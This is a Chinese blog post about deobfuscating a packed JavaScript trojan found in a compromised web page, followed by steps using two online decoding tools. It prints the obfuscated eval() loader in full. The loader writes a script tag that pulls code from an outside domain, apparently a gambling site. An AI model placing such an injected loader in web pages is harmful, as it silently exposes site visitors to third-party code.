Angular.js专场

网页木马病毒js解密方法

2018-04-21  本文已影响14人  thinkact
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\c\\b\\2\\m\\i\\8\\j\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\1\\2\\3\\9\\4\\0 \\0\\n\\4\\8\\d\\6\\0\\8\\k\\0\\5\\f\\e\\o\\e\\1\\2\\3\\9\\4\\0\\6 \\1\\3\\2\\d\\6\\t\\0\\0\\4\\1\\r\\5\\5\\7\\7\\7\\a\\q\\1\\1\\c\\s\\2\\a\\2\\b\\i\\5\\j\\p\\a\\f\\1\\6\\h\\g\\5\\1\\2\\3\\9\\4\\0\\h\');',30,30,'x74|x73|x63|x72|x70|x2f|x22|x77|x65|x69|x2e|x6f|x64|x3d|x61|x6a|x3c|x3e|x6d|x6e|x78|window|x75|x79|x76|x62|x67|x3a|x6c|x68'.split('|'),0,{}))
</script>

最近给人仿站,网页里发现了一段js脚本,加密了,用解密工具发现是一段病毒代码,链接到一个外部脚本,这个外部脚本是个博彩网站,原来是网站中毒被挂了木马!

解密方法:

一、用Javascript加密解密工具:http://www.bejson.com/enc/eval_package/

1.将脚本代码复制到工具中,去掉前后的<script>标签,点击解密,见下图;


image.png

2.得到解密结果,如下图;


image.png

3.分析解密后的代码,类似这种代码“|x22|x77|”是十六进制编码?后面怎么做?听说需要alert?谁懂得,教教我啊?放弃了。

二、用js解密工具:https://www.sojson.com/jsjiemi.html
1.贴上脚本代码到解密窗口,点击js解密;

image.png
2.这款工具更加智能,检测到代码被编码了,点确定,解码;
image.png
3.得到js解码、解码结果了,很强大的工具啊!
image.png
上一篇下一篇

猜你喜欢

热点阅读